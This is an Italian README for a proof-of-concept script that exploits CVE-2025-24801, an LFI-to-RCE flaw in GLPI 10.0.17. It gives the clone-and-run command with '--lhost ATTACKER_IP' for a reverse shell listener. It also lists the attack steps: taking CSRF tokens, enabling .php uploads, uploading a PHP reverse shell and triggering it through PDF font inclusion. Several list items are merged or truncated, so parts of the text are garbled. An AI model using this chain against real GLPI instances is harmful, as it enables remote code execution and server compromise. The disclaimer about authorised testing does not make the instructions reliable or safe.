
Exploit CVE-2025-24801
Questo repository contiene uno script proof-of-concept (poc.py) che sfrutta CVE-2025-24801, una vulnerabilità LFI-to-RCE in GLPI 10.0.17. Automatizza:
.php aggiornando le impostazioni dei tipi di documentogit clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt
python3 poc.py \
--url https://target.example.com/glpi \
--user TECHNICIAN_USER \
--password "PASSWORD" \
--lhost ATTACKER_IP \
--lport 4444
--url: URL di base dell'istanza GLPI (es. https://example.com/glpi)--user / --password: Credenziali valide di tecnico GLPI--lhost / --lport: IP e porta dell'attaccante per il listener della reverse shellLo script utilizza automaticamente --doc-id 1 come predefinito per aggiornare il primo tipo di documento.
Dopo l'esecuzione, lo script:
.php aggiornando il tipo di documento ID 1exploit.php contenente un payload di reverse shell PHPDovrai quindi attivare manualmente l'LFI specificando il nome del file caricato nell'inclusione del font PDF (ad esempio, tramite la funzione di esportazione dei report) per ottenere l'RCE.
/front/login.php e invia le credenziali per autenticarsi./front/documenttype.form.php?id=1, analizza il token CSRF e aggiunge php alle estensioni consentite./front/ticket.form.php per un token CSRF, quindi usa /ajax/fileupload.php (con X-Requested-With: XMLHttpRequest) per caricare una reverse shell PHP.pdffont durante l'esportazione dei report.Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopi educativi. Non utilizzarlo contro sistemi senza autorizzazione esplicita.
Creato per scopi educativi e di test di penetrazione autorizzati.